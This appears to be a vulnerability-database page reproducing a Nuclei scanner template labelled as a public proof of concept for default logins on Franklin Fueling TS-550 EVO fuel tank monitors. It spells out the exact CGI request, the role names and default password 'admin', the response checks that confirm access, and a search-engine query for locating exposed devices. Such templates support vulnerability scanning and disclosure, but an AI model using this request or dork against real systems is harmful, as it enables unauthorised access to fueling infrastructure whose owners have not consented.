漏洞描述
A default password vulnerability refers to a security flaw that arises when a system or device is shipped or set up with a pre-configured, default password that is commonly known or easily guessable.
franklin-fueling-default-login: Franklin Fueling System - Default Login
PoC代码[已公开]
id: franklin-fueling-default-login
info:
name: Franklin Fueling System - Default Login
author: r3Y3r53
severity: high
description: |
A default password vulnerability refers to a security flaw that arises when a system or device is shipped or set up with a pre-configured, default password that is commonly known or easily guessable.
reference:
- https://www.exploitalert.com/view-details.html?id=39466
classification:
cpe: cpe:2.3:o:franklinfueling:ts-550_evo_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: franklinfueling
product: ts-550_evo_firmware
google-query: inurl:"relay_status.html"
tags: default-login,franklin,vuln
http:
- raw:
- |
POST /21408623/cgi-bin/tsaws.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
<TSA_REQUEST_LIST PASSWORD="{{password}}"><TSA_REQUEST COMMAND="cmdWebCheckRole" ROLE="{{username}}"/></TSA_REQUEST_LIST>
attack: pitchfork
payloads:
username:
- roleAdmin
- roleUser
- roleGuest
password:
- admin
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/xml")'
- 'contains(body, "</TSA_RESPONSE_LIST>")'
- 'contains(body, "roleAdmin") || contains(body, "roleUser") || contains(body, "roleGuest")'
condition: and
# digest: 490a00463044022068d318d2e176cb0ecd3c78f8e6a9462484be7d0babd2a45710fcf31b06f214d8022066ab0d4b00561f61d9a95d07fac14401e34a0b09fab68ddf89f5a2e10aa41d2c:922c64590222798bb761d5b6d8e72950